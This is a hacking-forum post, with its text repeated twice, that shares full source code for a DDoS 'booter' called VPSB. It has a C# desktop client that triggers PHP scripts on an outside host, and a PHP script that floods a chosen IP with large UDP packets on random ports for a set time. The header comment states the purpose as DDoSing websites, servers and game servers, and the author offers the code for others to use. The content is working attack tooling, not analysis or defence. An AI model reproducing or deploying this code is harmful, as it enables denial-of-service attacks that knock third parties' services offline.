[C#] VPSB - Booter Source

Vick

Member
Reputation
0
[C#] VPSB - Booter Source

This was made by me a few days ago, but I'm pretty bad at writing 'hacking tools' hence I'm a guy who writes software for clients for money, not black hat stuff etc. But this was my first attempt and it faileddddd.

Give credits if used, thanks.

C# Source & Screenshot of GUI
Code:
using System;using System.Collections.Generic;using System.ComponentModel;using System.Data;using System.Drawing;using System.Linq;using System.Text;using System.Windows.Forms;using System.Net;
namespace VPSB{    public partial class Form1 : Form    {        public Form1()        {            InitializeComponent();        }
        private void Form1_Load(object sender, EventArgs e)        {
        }
        private void btnStart_Click(object sender, EventArgs e)        {            string[] shells = new string[5];            shells[0] = "http://www.warezshack.com/vpsb/1/vpsb.php?host=";            shells[1] = "http://www.warezshack.com/vpsb/2/vpsb.php?host=";            shells[2] = "http://www.warezshack.com/vpsb/3/vpsb.php?host=";            shells[3] = "http://www.warezshack.com/vpsb/4/vpsb.php?host=";            shells[4] = "http://www.warezshack.com/vpsb/5/vpsb.php?host=";            System.Net.WebClient ShellClient = new System.Net.WebClient();            this.tbStatus.Text = "Attack on: " + tbHost.Text + " Initiated.";            this.btnStart.Enabled = false;            this.btnStart.Text = "Disabled while Attacking!";            for (int i = 0; i < 5; i++)            {                for (int threads = 0; threads < Convert.ToInt32(tbThreads.Text); threads++)                {                    string dlPage = ShellClient.DownloadString(shells[i] + tbHost.Text + "&time=" + tbTime.Text);                }            }            MessageBox.Show("Attack Run Complete!");            this.btnStart.Enabled = true;            this.tbStatus.Text = "Attack Complete.";        }    }}

nqiqS4.png


PHP Source
Code:
<?php/*  Project : Vick's Private Shell Booter  Version : 1.00  Date    : 18/06/2011  Author  : Vick Kumar  Contact : [email protected]  Purpose : DDOS Website, Servers, Game Servers -via [C#] Desktop App.  Web Use : vpsb.php?host=ipaddress&time=20 [ie: host=127.0.0.1&time=30(seconds)]*/// if host and time = to something then do this.// if not, then do nothing.if(isset($_GET['host'])&&isset($_GET['time'])){    // set out to zero, to display no errors.    $out = 0;    // set packets to zero.    $packets = 0;    ignore_user_abort(TRUE);    set_time_limit(0);    // set time via time=time(x)    $exec_time = $_GET['time'];    $time = time();    $max_time = $time+$exec_time;    // set ip, get it. via ip=1.1.1.1    $host = $_GET['host'];    for($i=0;$i<65000;$i++){            $out .= 'X';    }    while(1){    $packets++;            if(time() > $max_time){                    break;            }            $rand = rand(1,65000);            $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);            if($fp){                    fwrite($fp, $out);                    fclose($fp);            }    }}?>
 
[C#] VPSB - Booter Source

This was made by me a few days ago, but I'm pretty bad at writing 'hacking tools' hence I'm a guy who writes software for clients for money, not black hat stuff etc. But this was my first attempt and it faileddddd.

Give credits if used, thanks.

C# Source & Screenshot of GUI
Code:
using System;using System.Collections.Generic;using System.ComponentModel;using System.Data;using System.Drawing;using System.Linq;using System.Text;using System.Windows.Forms;using System.Net;
namespace VPSB{    public partial class Form1 : Form    {        public Form1()        {            InitializeComponent();        }
        private void Form1_Load(object sender, EventArgs e)        {
        }
        private void btnStart_Click(object sender, EventArgs e)        {            string[] shells = new string[5];            shells[0] = "http://www.warezshack.com/vpsb/1/vpsb.php?host=";            shells[1] = "http://www.warezshack.com/vpsb/2/vpsb.php?host=";            shells[2] = "http://www.warezshack.com/vpsb/3/vpsb.php?host=";            shells[3] = "http://www.warezshack.com/vpsb/4/vpsb.php?host=";            shells[4] = "http://www.warezshack.com/vpsb/5/vpsb.php?host=";            System.Net.WebClient ShellClient = new System.Net.WebClient();            this.tbStatus.Text = "Attack on: " + tbHost.Text + " Initiated.";            this.btnStart.Enabled = false;            this.btnStart.Text = "Disabled while Attacking!";            for (int i = 0; i < 5; i++)            {                for (int threads = 0; threads < Convert.ToInt32(tbThreads.Text); threads++)                {                    string dlPage = ShellClient.DownloadString(shells[i] + tbHost.Text + "&time=" + tbTime.Text);                }            }            MessageBox.Show("Attack Run Complete!");            this.btnStart.Enabled = true;            this.tbStatus.Text = "Attack Complete.";        }    }}

nqiqS4.png


PHP Source
Code:
<?php/*  Project : Vick's Private Shell Booter  Version : 1.00  Date    : 18/06/2011  Author  : Vick Kumar  Contact : [email protected]  Purpose : DDOS Website, Servers, Game Servers -via [C#] Desktop App.  Web Use : vpsb.php?host=ipaddress&time=20 [ie: host=127.0.0.1&time=30(seconds)]*/// if host and time = to something then do this.// if not, then do nothing.if(isset($_GET['host'])&&isset($_GET['time'])){    // set out to zero, to display no errors.    $out = 0;    // set packets to zero.    $packets = 0;    ignore_user_abort(TRUE);    set_time_limit(0);    // set time via time=time(x)    $exec_time = $_GET['time'];    $time = time();    $max_time = $time+$exec_time;    // set ip, get it. via ip=1.1.1.1    $host = $_GET['host'];    for($i=0;$i<65000;$i++){            $out .= 'X';    }    while(1){    $packets++;            if(time() > $max_time){                    break;            }            $rand = rand(1,65000);            $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);            if($fp){                    fwrite($fp, $out);                    fclose($fp);            }    }}?>
 
Back
Top